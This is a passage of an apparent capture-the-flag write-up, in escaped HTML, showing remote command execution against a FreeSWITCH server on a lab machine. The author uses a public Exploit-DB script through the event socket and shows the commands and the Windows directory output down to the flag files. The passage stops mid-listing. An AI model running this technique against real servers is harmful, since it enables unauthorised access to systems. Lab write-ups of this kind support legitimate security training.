&lt;p&gt;&lt;em&gt;**FreeSWITCH&lt;/em&gt;* is &lt;a href="https://en.wikipedia.org/wiki/Free_and_open-source"&gt;free and open-source&lt;/a&gt; server software for &lt;a href="https://en.wikipedia.org/wiki/Real-time_communication"&gt;real-time communication&lt;/a&gt; applications, including &lt;a href="https://en.wikipedia.org/wiki/WebRTC"&gt;WebRTC&lt;/a&gt;, &lt;a href="https://en.wikipedia.org/wiki/Video"&gt;video&lt;/a&gt;, and &lt;a href="https://en.wikipedia.org/wiki/Voice_over_Internet_Protocol"&gt;voice over Internet Protocol&lt;/a&gt; (VoIP). It runs on &lt;a href="https://en.wikipedia.org/wiki/Linux"&gt;Linux&lt;/a&gt;, &lt;a href="https://en.wikipedia.org/wiki/Windows"&gt;Windows&lt;/a&gt;, &lt;a href="https://en.wikipedia.org/wiki/MacOS"&gt;macOS&lt;/a&gt;, and &lt;a href="https://en.wikipedia.org/wiki/FreeBSD"&gt;FreeBSD&lt;/a&gt;. FreeSWITCH is used to build &lt;a href="https://en.wikipedia.org/wiki/Private_branch_exchange"&gt;private branch exchange&lt;/a&gt; (PBX) &lt;a href="https://en.wikipedia.org/wiki/Telecommunication"&gt;telecommunication&lt;/a&gt; systems, &lt;a href="https://en.wikipedia.org/wiki/IVR"&gt;IVR&lt;/a&gt; services, &lt;a href="https://en.wikipedia.org/wiki/Videoconferencing"&gt;videoconferencing&lt;/a&gt; with &lt;a href="https://en.wikipedia.org/wiki/Online_chat"&gt;chat&lt;/a&gt; and &lt;a href="https://en.wikipedia.org/wiki/Screen_sharing"&gt;screen sharing&lt;/a&gt;, wholesale &lt;a href="https://en.wikipedia.org/wiki/Least-cost_routing"&gt;least-cost routing&lt;/a&gt;, &lt;a href="https://en.wikipedia.org/wiki/Session_Border_Controller"&gt;Session Border Controller&lt;/a&gt; (SBC) and &lt;a href="https://en.wikipedia.org/wiki/Embedded_system"&gt;embedded&lt;/a&gt; communication &lt;a href="https://en.wikipedia.org/wiki/Computer_appliance"&gt;appliances&lt;/a&gt;.*&lt;/p&gt;

&lt;p&gt;Let's look for some vulnerabilities.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;└─&lt;span class="nv"&gt;$ &lt;/span&gt;searchsploit freeswitch                                
&lt;span class="nt"&gt;---------------------------------------------------------------------------------------------------------------------------&lt;/span&gt; &lt;span class="nt"&gt;---------------------------------&lt;/span&gt;
 Exploit Title                                                                                                             |  Path
&lt;span class="nt"&gt;---------------------------------------------------------------------------------------------------------------------------&lt;/span&gt; &lt;span class="nt"&gt;---------------------------------&lt;/span&gt;
FreeSWITCH - Event Socket Command Execution &lt;span class="o"&gt;(&lt;/span&gt;Metasploit&lt;span class="o"&gt;)&lt;/span&gt;                                                                   | multiple/remote/47698.rb
FreeSWITCH 1.10.1 - Command Execution                                                                                      | windows/remote/47799.txt
&lt;span class="nt"&gt;---------------------------------------------------------------------------------------------------------------------------&lt;/span&gt; &lt;span class="nt"&gt;---------------------------------&lt;/span&gt;
Shellcodes: No Results

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Interesting. Let's try and get RCE without Metasploit.&lt;/p&gt;

&lt;h1&gt;
  
  
  Foothold
&lt;/h1&gt;

&lt;h3&gt;
  
  
  RCE without Metasploit
&lt;/h3&gt;

&lt;p&gt;Using the script present here =&amp;gt; &lt;a href="https://www.exploit-db.com/exploits/47799"&gt;https://www.exploit-db.com/exploits/47799&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;└─&lt;span class="nv"&gt;$ &lt;/span&gt;python3 exploit.py flatline.thm &lt;span class="nb"&gt;whoami
&lt;/span&gt;Authenticated
Content-Type: api/response
Content-Length: 25

win-eom4pk0578n&lt;span class="se"&gt;\n&lt;/span&gt;ekrotic

&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Looks like it works! Let's try and get a proper shell going on here.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="err"&gt;└─$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;python3&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;exploit.py&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;10.10.7.242&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;dir&lt;/span&gt;&lt;span class="w"&gt;   
&lt;/span&gt;&lt;span class="n"&gt;Authenticated&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="nx"&gt;Content-Type:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;api/response&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;Content-Length:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;2346&lt;/span&gt;&lt;span class="w"&gt;

 &lt;/span&gt;&lt;span class="n"&gt;Volume&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;in&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;drive&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;has&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;no&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;label.&lt;/span&gt;&lt;span class="w"&gt;
 &lt;/span&gt;&lt;span class="n"&gt;Volume&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Serial&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Number&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;is&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;84FD-2CC9&lt;/span&gt;&lt;span class="w"&gt;

 &lt;/span&gt;&lt;span class="n"&gt;Directory&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;of&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C:\Program&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Files\FreeSWITCH&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="mi"&gt;09&lt;/span&gt;&lt;span class="n"&gt;/11/2021&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;07:38&lt;/span&gt;&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;DIR&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt;          &lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="mi"&gt;09&lt;/span&gt;&lt;span class="n"&gt;/11/2021&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;07:38&lt;/span&gt;&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;DIR&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt;          &lt;/span&gt;&lt;span class="o"&gt;..&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="mi"&gt;09&lt;/span&gt;&lt;span class="n"&gt;/11/2021&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;07:22&lt;/span&gt;&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;DIR&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt;          &lt;/span&gt;&lt;span class="nx"&gt;cert&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="mi"&gt;09&lt;/span&gt;&lt;span class="n"&gt;/11/2021&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;07:22&lt;/span&gt;&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;DIR&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt;          &lt;/span&gt;&lt;span class="nx"&gt;conf&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="mi"&gt;06&lt;/span&gt;&lt;span class="n"&gt;/11/2022&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;10:33&lt;/span&gt;&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;DIR&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt;          &lt;/span&gt;&lt;span class="nx"&gt;db&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="mi"&gt;09&lt;/span&gt;&lt;span class="n"&gt;/11/2021&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;07:18&lt;/span&gt;&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;DIR&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt;          &lt;/span&gt;&lt;span class="nx"&gt;fonts&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="mi"&gt;20&lt;/span&gt;&lt;span class="n"&gt;/08/2019&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;12:08&lt;/span&gt;&lt;span class="w"&gt;         &lt;/span&gt;&lt;span class="nx"&gt;4&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nx"&gt;991&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nx"&gt;488&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;FreeSwitch.dll&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="mi"&gt;20&lt;/span&gt;&lt;span class="n"&gt;/08/2019&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;12:08&lt;/span&gt;&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="nx"&gt;26&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nx"&gt;624&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;FreeSwitchConsole.exe&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="mi"&gt;20&lt;/span&gt;&lt;span class="n"&gt;/08/2019&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;12:19&lt;/span&gt;&lt;span class="w"&gt;            &lt;/span&gt;&lt;span class="nx"&gt;62&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nx"&gt;976&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;fs_cli.exe&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="mi"&gt;09&lt;/span&gt;&lt;span class="n"&gt;/11/2021&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;07:18&lt;/span&gt;&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;DIR&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt;          &lt;/span&gt;&lt;span class="nx"&gt;grammar&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="o"&gt;---&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;SNIP&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="o"&gt;---&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="mi"&gt;24&lt;/span&gt;&lt;span class="n"&gt;/03/2018&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;20:20&lt;/span&gt;&lt;span class="w"&gt;        &lt;/span&gt;&lt;span class="nx"&gt;15&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nx"&gt;766&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nx"&gt;528&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;v8.dll&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="mi"&gt;24&lt;/span&gt;&lt;span class="n"&gt;/03/2018&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;20:05&lt;/span&gt;&lt;span class="w"&gt;           &lt;/span&gt;&lt;span class="nx"&gt;177&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nx"&gt;152&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;v8_libbase.dll&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="mi"&gt;24&lt;/span&gt;&lt;span class="n"&gt;/03/2018&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;20:19&lt;/span&gt;&lt;span class="w"&gt;           &lt;/span&gt;&lt;span class="nx"&gt;134&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nx"&gt;656&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;v8_libplatform.dll&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="mi"&gt;03&lt;/span&gt;&lt;span class="n"&gt;/04/2018&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;14:01&lt;/span&gt;&lt;span class="w"&gt;           &lt;/span&gt;&lt;span class="nx"&gt;126&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nx"&gt;976&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;zlib.dll&lt;/span&gt;&lt;span class="w"&gt;
              &lt;/span&gt;&lt;span class="mi"&gt;28&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;File&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;     &lt;/span&gt;&lt;span class="nx"&gt;96&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nx"&gt;800&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nx"&gt;060&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;bytes&lt;/span&gt;&lt;span class="w"&gt;
              &lt;/span&gt;&lt;span class="mi"&gt;17&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;Dir&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;50&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nx"&gt;476&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nx"&gt;666&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nx"&gt;880&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;bytes&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;free&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Let's try and get the user flag.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight powershell"&gt;&lt;code&gt;&lt;span class="err"&gt;└─$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;python3&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;exploit.py&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;10.10.7.242&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"dir C:\\Users\\"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;Authenticated&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="nx"&gt;Content-Type:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;api/response&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;Content-Length:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;405&lt;/span&gt;&lt;span class="w"&gt;

 &lt;/span&gt;&lt;span class="n"&gt;Volume&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;in&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;drive&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;has&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;no&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;label.&lt;/span&gt;&lt;span class="w"&gt;
 &lt;/span&gt;&lt;span class="n"&gt;Volume&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Serial&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Number&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;is&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;84FD-2CC9&lt;/span&gt;&lt;span class="w"&gt;

 &lt;/span&gt;&lt;span class="n"&gt;Directory&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;of&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C:\Users&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="mi"&gt;09&lt;/span&gt;&lt;span class="n"&gt;/11/2021&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;07:28&lt;/span&gt;&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;DIR&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt;          &lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="mi"&gt;09&lt;/span&gt;&lt;span class="n"&gt;/11/2021&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;07:28&lt;/span&gt;&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;DIR&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt;          &lt;/span&gt;&lt;span class="o"&gt;..&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="mi"&gt;09&lt;/span&gt;&lt;span class="n"&gt;/11/2021&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;07:13&lt;/span&gt;&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;DIR&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt;          &lt;/span&gt;&lt;span class="nx"&gt;Administrator&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="mi"&gt;09&lt;/span&gt;&lt;span class="n"&gt;/11/2021&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;07:37&lt;/span&gt;&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;DIR&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt;          &lt;/span&gt;&lt;span class="nx"&gt;Nekrotic&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="mi"&gt;09&lt;/span&gt;&lt;span class="n"&gt;/11/2021&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;07:13&lt;/span&gt;&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;DIR&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt;          &lt;/span&gt;&lt;span class="nx"&gt;Public&lt;/span&gt;&lt;span class="w"&gt;
               &lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;File&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;              &lt;/span&gt;&lt;span class="nx"&gt;0&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;bytes&lt;/span&gt;&lt;span class="w"&gt;
               &lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;Dir&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;50&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nx"&gt;457&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nx"&gt;559&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nx"&gt;040&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;bytes&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;free&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="err"&gt;└─$&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;python3&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;exploit.py&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;10.10.7.242&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"dir C:\\Users\\Nekrotic\\Desktop\\"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;Authenticated&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="nx"&gt;Content-Type:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;api/response&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="n"&gt;Content-Length:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;374&lt;/span&gt;&lt;span class="w"&gt;

 &lt;/span&gt;&lt;span class="n"&gt;Volume&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;in&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;drive&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;has&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;no&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;label.&lt;/span&gt;&lt;span class="w"&gt;
 &lt;/span&gt;&lt;span class="n"&gt;Volume&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Serial&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;Number&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;is&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;84FD-2CC9&lt;/span&gt;&lt;span class="w"&gt;

 &lt;/span&gt;&lt;span class="n"&gt;Directory&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;of&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;C:\Users\Nekrotic\Desktop&lt;/span&gt;&lt;span class="w"&gt;

&lt;/span&gt;&lt;span class="mi"&gt;09&lt;/span&gt;&lt;span class="n"&gt;/11/2021&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;07:39&lt;/span&gt;&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;DIR&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt;          &lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="mi"&gt;09&lt;/span&gt;&lt;span class="n"&gt;/11/2021&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;07:39&lt;/span&gt;&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="err"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;DIR&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;&lt;/span&gt;&lt;span class="w"&gt;          &lt;/span&gt;&lt;span class="o"&gt;..&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="mi"&gt;09&lt;/span&gt;&lt;span class="n"&gt;/11/2021&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;07:39&lt;/span&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="nx"&gt;38&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;root.txt&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="mi"&gt;09&lt;/span&gt;&lt;span class="n"&gt;/11/2021&lt;/span&gt;&lt;span class="w"&gt;  &lt;/span&gt;&lt;span class="nx"&gt;07:39&lt;/span&gt;&lt;span class="w"&gt;                &lt;/span&gt;&lt;span class="nx"&gt;38&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;user.txt&lt;/span&gt;&lt;span class="w"&gt;
               &lt;/span&gt;&lt;span class="mi"&gt;2&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;File&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;s&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="w"&gt;             &lt;/span&gt;&lt;span class="nx"&gt;76&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;bytes&lt;/span&gt;&lt;span class="w"&gt;
